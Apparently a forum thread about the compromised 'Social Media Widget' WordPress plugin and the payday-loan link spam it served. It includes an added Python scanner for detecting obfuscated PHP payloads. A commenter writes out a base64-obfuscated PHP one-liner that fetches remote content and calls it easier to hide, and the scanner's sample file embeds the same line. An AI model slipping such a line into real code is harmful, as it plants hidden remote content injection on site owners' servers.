For a "hidden" payload, it looks awfully complicated and long. This could've been accomplished with a simple one-liner that would've been easier to hide:

    echo @file_get_contents(base64_decode("aHR0cDovL2kuYWF1ci5uZXQvaS5waHA="));

Plus it may have looked like "black magic" to someone not acquainted with @-prefixed functions in PHP and base64 =)

> It's the fact that the malicious payload found its way in the core files. It was then uploaded to the WordPress.org Plugin Repository.

I second this fear.
Many of us would be quick to dismiss this issue (call me biased, but I don't see this gaining as much "traction" as the crisis we had when RubyGems was compromised) because "PHP is bad and you should feel bad" or "WordPress users can't code", but this is not "a repository is being hacked", this is "a plugin with malicious code has been uploaded ready to be used". This is exactly the same as an npm module handling payments gaining a 20-line payload sending critical info to parts unknown when bumping from 1.0.1 to 1.0.2: a plugin developer pushed corrupt code to be used in production (though there is nothing about it, I hope this happened without malice on this person's behalf).

This makes me seriously wonder: how many of us ACTUALLY "dive" into the libraries we use day-to-day in production apps? How many of us read every part of these libraries when we don't need to understand/debug them?

The last time you used Boost Threads, did you read (and understand) their source code? What about Express or Mongoose in your Node.js-powered e-commerce web app? Or your RoR app using Mongoid?

Waiting for input, opinions, advice, best practices and the like.
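One concrete answer to "how many of us actually dive into the libraries we use": a small scanner for the obfuscation pattern the first comment describes (a base64 string literal that decodes to a URL, fed into an error-suppressed fetch call). This is an added example for defenders, not code from the thread or the plugin; the sample PHP file and the function names are constructed for the demo.

```python
"""Flag base64-hidden URLs and '@'-suppressed remote-fetch/exec calls in PHP."""
import base64
import binascii
import re
from typing import Optional

# Calls that fetch remote content or execute code; a hidden URL flowing into
# one of these is exactly what the one-liner in the thread does.
RISKY_CALLS = ("file_get_contents", "fopen", "curl_init", "eval", "include", "require")

B64_LITERAL = re.compile(r'base64_decode\(\s*["\']([A-Za-z0-9+/=]+)["\']\s*\)')
SUPPRESSED_CALL = re.compile(r'@\s*(' + '|'.join(RISKY_CALLS) + r')\s*\(')


def decode_literal(literal: str) -> Optional[str]:
    """Return the decoded text if `literal` is valid base64 of printable ASCII."""
    try:
        raw = base64.b64decode(literal, validate=True)
        text = raw.decode("ascii")
    except (binascii.Error, ValueError, UnicodeDecodeError):
        return None
    return text if text.isprintable() else None


def scan_php_source(src: str) -> list:
    """Return one finding per suspicious construct, with its 1-based line number."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        for m in B64_LITERAL.finditer(line):
            decoded = decode_literal(m.group(1))
            if decoded and re.match(r"https?://", decoded):
                findings.append({"line": lineno, "kind": "hidden_url", "value": decoded})
        for m in SUPPRESSED_CALL.finditer(line):
            findings.append({"line": lineno, "kind": "suppressed_call", "value": m.group(1)})
    return findings


# Constructed sample: a benign widget file with the thread's one-liner appended.
SAMPLE_PHP = """<?php
function smw_render_widget($args) {
    echo '<div class="social-media-widget">' . esc_html($args['title']) . '</div>';
}
echo @file_get_contents(base64_decode("aHR0cDovL2kuYWF1ci5uZXQvaS5waHA="));
"""

if __name__ == "__main__":
    for finding in scan_php_source(SAMPLE_PHP):
        print(finding)
```

Running it over a plugin directory before deploying an update is a cheap first pass; it will not catch every obfuscation, but it does catch the one this thread is about.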
Some sophisticated SEO link spam for 'pay day loans'

Out of curiosity, I looked up that particular pay day loan site's backlink profile. They went from having zero websites linking to them to around 250,000 in a matter of a few hours. All of the links had anchor text with some variation of 'payday loans' or 'payday loans UK'.

Here's a screenshot of their backlink increase: http://i.imgur.com/Qo20DkL.png

Doesn't look like they are ranking on page 1 yet for any of those terms, which is good. Hopefully Google is on to them.
You can read the original plugin author's response here: http://wordpress.org/support/topic/plugin-social-media-widget-php-notice-undefined-index-pinterest-on-line-66
It has been removed from wordpress.org. The support page is working, though:

http://wordpress.org/support/plugin/social-media-widget